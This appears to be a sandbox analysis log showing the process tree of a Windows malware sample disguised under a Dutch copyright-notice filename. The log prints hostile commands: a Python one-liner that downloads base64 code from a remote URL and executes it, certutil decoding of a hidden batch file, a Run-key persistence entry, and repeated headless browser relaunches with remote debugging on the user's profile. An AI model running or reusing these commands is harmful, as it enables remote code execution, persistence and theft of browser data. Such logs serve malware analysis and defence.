    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1552,i,9936804200057136903,10388487087792257288,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1536 /prefetch:2
        5⤵
        
        PID:5468
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1564,i,9936804200057136903,10388487087792257288,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1556 /prefetch:3
        5⤵
        
        PID:5260
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:3804
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:1280
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:5736
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1544,i,13197003878622622110,6595564091220583436,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1528 /prefetch:2
        5⤵
        
        PID:4468
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1772,i,13197003878622622110,6595564091220583436,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1768 /prefetch:3
        5⤵
        
        PID:3172
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:3124
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:1176
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:6056
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1528,i,6580304340409440611,340654341419805673,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1520 /prefetch:2
        5⤵
        
        PID:5324
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1780,i,6580304340409440611,340654341419805673,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1776 /prefetch:3
        5⤵
        
        PID:568
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:444
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:4428
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:1040
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1492,i,16300471665227318484,13153650782485397674,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1484 /prefetch:2
        5⤵
        
        PID:5152
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1780,i,16300471665227318484,13153650782485397674,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1776 /prefetch:3
        5⤵
        
        PID:3576
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5540
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:5408
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x148,0x14c,0x150,0x124,0x154,0x7ffc465a46f8,0x7ffc465a4708,0x7ffc465a4718
        5⤵
        
        PID:5752
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1488,12632627080800080586,8103771319842779508,131072 --disable-features=PaintHolding --no-sandbox --headless --log-level=3 --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --log-level=3 --mojo-platform-channel-handle=1496 /prefetch:2
        5⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:2432
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1488,12632627080800080586,8103771319842779508,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-gl=swiftshader-webgl --headless --log-level=3 --mojo-platform-channel-handle=1708 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4396
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --log-level=3 --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=1488,12632627080800080586,8103771319842779508,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1932 /prefetch:1
        5⤵
        Uses browser remote debugging
        Suspicious behavior: EnumeratesProcesses
        
        PID:2248
- - C:\Windows\SysWOW64\certutil.exe
    certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"
    3⤵
    - Manipulates Digital Signatures
    - Deobfuscate/Decode Files or Information
    - System Location Discovery: System Language Discovery
    PID:5068
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:3520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\Downloads\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur\images\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.pdf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5112
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Downloads\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur\images\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.pdf
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    PID:1972
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ffc45c046f8,0x7ffc45c04708,0x7ffc45c04718
      4⤵
      PID:2624
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,8157531752603967853,8854634252331742519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
      4⤵
      PID:1180
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,8157531752603967853,8854634252331742519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2996
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,8157531752603967853,8854634252331742519,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
      4⤵
      PID:2948
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8157531752603967853,8854634252331742519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
      4⤵
      PID:5388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8157531752603967853,8854634252331742519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
      4⤵
      PID:5404
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8157531752603967853,8854634252331742519,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:1
      4⤵
      PID:5140
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2132,8157531752603967853,8854634252331742519,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=2584 /prefetch:6
      4⤵
      PID:2088
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8157531752603967853,8854634252331742519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
      4⤵
      PID:6120
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8157531752603967853,8854634252331742519,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
      4⤵
      PID:6112
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8157531752603967853,8854634252331742519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6208 /prefetch:8
      4⤵
      PID:4292
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      Drops file in Program Files directory
      PID:5340
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x2a0,0x2a4,0x2a8,0x124,0x2ac,0x7ff6efd35460,0x7ff6efd35470,0x7ff6efd35480
        5⤵
        
        PID:6060
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8157531752603967853,8854634252331742519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6208 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5648
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8157531752603967853,8854634252331742519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1
      4⤵
      PID:5788
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8157531752603967853,8854634252331742519,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:1
      4⤵
      PID:5392

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5276

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5400

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:1940

C:\Users\Admin\Downloads\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
"C:\Users\Admin\Downloads\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:2984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\Downloads\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur\images\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.bat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2896
- - C:\Users\Admin\Downloads\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur\images\Rar.exe
    Rar x -pC2PINduHvfu86NQXni -inul -y QkCIiJe4GE3FJLfTqe.rar C:\Users\Public\R8D4YmtQLNucXFlnq3
    3⤵
    PID:4796
- - C:\Users\Public\R8D4YmtQLNucXFlnq3\synaptics.exe
    "C:\Users\Public\R8D4YmtQLNucXFlnq3\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/insurify-html-v1.1/documentation/assets/img/glyphicons/Server_VIP/Adonis/Adonis_ALL').text))"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4756
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5736
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:5760
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x228,0x22c,0x230,0x204,0x238,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:5848
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1488,i,2578497549602046040,8597514903473019658,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1480 /prefetch:2
        5⤵
        
        PID:4608
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1776,i,2578497549602046040,8597514903473019658,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1772 /prefetch:3
        5⤵
        
        PID:2204
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5520
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:3684
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:2488
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1528,i,7888554239319823954,13216125681623279917,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1512 /prefetch:2
        5⤵
        
        PID:5988
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1768,i,7888554239319823954,13216125681623279917,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1764 /prefetch:3
        5⤵
        
        PID:4712
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5352
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:5764
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x22c,0x230,0x238,0x208,0x23c,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:2084
